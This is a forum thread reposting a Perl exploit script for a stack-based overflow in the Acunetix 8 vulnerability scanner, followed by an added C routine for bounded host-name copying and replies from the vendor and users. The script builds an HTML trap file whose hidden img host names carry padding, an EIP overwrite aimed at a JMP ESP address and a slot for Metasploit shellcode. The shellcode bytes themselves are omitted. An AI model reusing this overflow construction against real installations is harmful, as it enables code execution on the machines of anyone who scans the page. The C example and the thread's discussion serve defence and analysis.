SirGod

Acunetix 8 build 20120704 - Remote Stack Based Overflow


Have fun! :-)

# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP

# This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.

my $file= "index.html";
my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";

my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;

my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).

# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
my $shellcode2 = ""; # encoded payload bytes omitted

my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;

my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
open($FILE,">$file");
print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print"Acunetix Killer File Created successfully\n";


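The script above places its payload in the host part of an `<img src=http://...>` URL, padded far beyond any valid DNS name, and its five decoy hosts are short names followed by 190 dots. As an added example (not Acunetix code and not part of the original post), this is a bounded host copy that rejects both shapes before any byte is written; `copy_host` and the return codes are hypothetical names, and it assumes the crash comes from copying the host into a fixed-size buffer without a length check.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_HOST  253   /* RFC 1035 limit on a full host name */
#define MAX_LABEL  63   /* RFC 1035 limit on one dot-separated label */

enum host_rc { HOST_OK = 0, HOST_NO_SCHEME, HOST_EMPTY, HOST_TOO_LONG, HOST_BAD_LABEL };

/* Copy the host part of an http:// URL into out (capacity out_len).
 * The host is measured and validated first; out is only filled on HOST_OK. */
enum host_rc copy_host(const char *url, char *out, size_t out_len)
{
    static const char scheme[] = "http://";
    size_t n, label = 0;

    if (out_len == 0)
        return HOST_TOO_LONG;
    out[0] = '\0';
    if (strncmp(url, scheme, sizeof scheme - 1) != 0)
        return HOST_NO_SCHEME;
    url += sizeof scheme - 1;

    /* The host ends at the first path, port, query, tag or quote delimiter. */
    n = strcspn(url, "/:?#> \t\r\n\"'");
    if (n == 0)
        return HOST_EMPTY;
    if (n > MAX_HOST || n >= out_len)
        return HOST_TOO_LONG;          /* would not fit: refuse, never truncate */

    for (size_t i = 0; i < n; i++) {
        if (url[i] == '.') {
            if (label == 0)
                return HOST_BAD_LABEL; /* leading dot or ".." run */
            label = 0;
        } else if (++label > MAX_LABEL) {
            return HOST_BAD_LABEL;
        }
    }
    memcpy(out, url, n);
    out[n] = '\0';
    return HOST_OK;
}

int main(void)
{
    char host[MAX_HOST + 1];
    /* Constructed sample input: an ordinary host is accepted. */
    printf("%d %s\n", copy_host("http://www.example.com/a.png", host, sizeof host), host);
    return 0;
}
```
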
acunetix

39 minutes ago

We cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9.

However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the crack replaced the executable with another executable.

It figures.

Edited by tpad

At first glance it looks interesting, but it is not a remote exploit; it is a local exploit. You can clearly see the index.html file being created.

An7i Security: Pwn the n00bs - Acunetix 0day ---> video

Either I'm thick in the head, or this is a local exploit.

For example, this exploit from exploit-db, Acunetix 8 build 20120704 - Remote Stack Based Overflow, looks like a remote exploit, but in the same way it does "create file" and uses a payload like calc and back-connect; it does not attack a port directly or do other wonders that would make it remote.

In this video it is the same: create file.

I say this is a local exploit :)
